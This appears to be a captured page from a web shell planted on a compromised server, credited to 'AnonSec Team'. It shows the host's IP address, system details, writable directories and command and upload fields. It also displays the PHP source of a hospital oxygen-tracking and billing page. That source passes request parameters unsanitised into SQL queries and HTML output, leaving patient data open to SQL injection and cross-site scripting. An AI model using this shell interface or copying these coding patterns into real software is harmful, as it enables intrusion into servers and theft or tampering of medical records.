Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.116.21.152
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/oxygen.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST[Oxygenva]))

	{
		PatientManager::Oxygen("$_GET[prescriptionid]","$_GET[patientid]","$_POST[Oxygen]","$_POST[Oxygen_start]","$_POST[Oxygen_stop]","$_POST[entered_by]");
	 }

?>

<?php

if(isset($_POST['updateoxygen'])) 
{ 	
  	$sql6="UPDATE Oxygen SET Oxygen='$_POST[Oxygen]',Oxygen_stop='$_POST[Oxygen_stop]' WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'  AND Oxygen='on' AND id='$_POST[id]'";
if($qsql6 = mysqli_query($con,$sql6))
		{
echo "<script>alert('Update successfully');</script><script>window.location='nursingrecodstest.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]'</script>;</script>";

$sql4 ="SELECT * FROM Oxygen WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND id='$_POST[id]'";
		$qsql4 = mysqli_query($con,$sql4);
		while($rpn = mysqli_fetch_array($qsql4))
		{
		   

$date1 =$rpn[Oxygen_start]; 
$date2 =$rpn[Oxygen_stop]; 
$timestamp1 = strtotime($date1);
$timestamp2 = strtotime($date2);
$hour = abs($timestamp2 - $timestamp1)/(60*60);
$d8=round($hour);

if ($rpn[Oxygen_stop]=='') {
if ($d8 < "1") {
}
} 

else
{
$total=$d8;
}
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
$today = date('Y-m-d');
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
{
$sql56 ="SELECT * FROM request_for_admission WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql56 = mysqli_query($con,$sql56);
		while($rs56 = mysqli_fetch_array($qsql56))
		{
	$sql212 ="SELECT * FROM tarifrate WHERE tarifid='27' AND hospitalid='$re[entered_by]' AND wardid='$rs56[Ward]'";
$qsql212 = mysqli_query($con,$sql212);
if($rs112 = mysqli_fetch_array($qsql212))
{
    $subbill=$total*$rs112[rate];
  	$msg=mysqli_query($con,"insert into patient_invace(patientid,	prescriptionid,discription,pagetype,link,pricetotal,discount,grand_total,paymentmode,status,entered_by,created_at,updated_at) values('$_GET[patientid]','$_GET[prescriptionid]','Oxyzen_Billing','$total','drinvace.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$_POST[id]','$subbill','','','','','$usertype','','')");
		{
		    
		}
    
}
}
}
}

}
  	}
?>

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Dashboard">
    <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina">

    <title>Oxygen </title>
 <h3><i class="fa fa-angle-right"></i> &nbsp; &nbsp; Oxygen  </h3>
           	
  <body>
      <?php
 $DisplayForm=True;
		$sql5 ="SELECT * FROM Oxygen WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND Oxygen='on'";
		$qsql5 = mysqli_query($con,$sql5);
		if($rt5 = mysqli_fetch_array($qsql5))
		{
$DisplayForm=False;
date_default_timezone_set('Asia/Kolkata');
$date = date('y-m-d h:i:s');
echo "
<form name='updateoxygen' method='post'>
 <input type='hidden' name='id' value='$rt5[id]'>

 <input type='hidden' name='Oxygen_stop' value='20$date'>
 <script>
var today = new Date();
var time = today.getHours() + ':' + today.getMinutes() + ':' + today.getSeconds();
  document.getElementById('myCheckOxygen').value = time;
</script>
<button type='submit' name='updateoxygen'>Stop</button>
  </form>";
		}
if($DisplayForm)
{
?>
<form name="Oxygenva" method="post">
    <input type='hidden' value='on' name='Oxygen'>
    <?php
    date_default_timezone_set('Asia/Kolkata');
$date = date('y-m-d h:i:s');
echo"
 <input type='hidden' name='Oxygen_start' value='20$date'>
 ";
 ?>
 <script>
var today = new Date();
var time = today.getHours() + ':' + today.getMinutes() + ':' + today.getSeconds();
  document.getElementById('myCheckOxygenstart').value = time;
</script>
<button type='submit' name='Oxygenva'>Start</button>
  </form>
           	  <?php
}
?>	
           	
          	<style>
    form{
        margin: 20px 0;
    }
    form input, button{
        padding: 5px;
    }
    table{
        width: 100%;
        margin-bottom: 20px;
		border-collapse: collapse;
    }
    table, th, td{
        border: 1px solid #cdcdcd;
    }
    table th, table td{
        padding: 10px;
        text-align: left;
    }
	<style>
           
			table{
    border: solid 1px gray;
    width: 100%;
  }
  </style>
  </head>
 
    <div id="container">
 <table border="1">
      <tbody>
                  <tr>
          <th><div align="center">Start At <br>
          (YYYY-MM-DD)</div></th>
          <th><div align="center">Stop At <br>
          (YYYY-MM-DD)</div></th>
            <th><div align="center">Duration </div></th>
          <th><div align="center">Created By</div></th> 
          <th><div align="center">Action</div></th>    

               </tr>
        </tbody>
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
	  $narayan=LoginManager::currentUser();
$harilal=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$harilal'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
$sql4 ="SELECT * FROM Oxygen WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
		$qsql4 = mysqli_query($con,$sql4);
		while($rpn = mysqli_fetch_array($qsql4))
		{
		    
		    $date1 =$rpn[Oxygen_start]; 

$date2 =$rpn[Oxygen_stop]; 
$timestamp1 = strtotime($date1);
$timestamp2 = strtotime($date2);
$hour = abs($timestamp2 - $timestamp1)/(60*60);

$d8=round($hour);
echo " <tbody>
	                <tr>
             <td>&nbsp;$rpn[Oxygen_start]</td>
                   <td>&nbsp;$rpn[Oxygen_stop]</td>
                 
                    <td>";
if ($rpn[Oxygen_stop]=='') {
if ($d8 < "1") {
}
} 

else
{
    echo"$d8";
}


    echo"</td>
       <td>&nbsp;$re[name]</td>
                  <td>&nbsp;Details</td>
                                 </tr>                   
          
          ";


}

}

?>   
</tbody>
  <tfoot>
          </tfoot>
        </table>



      </div>

Anon7 - 2022
AnonSec Team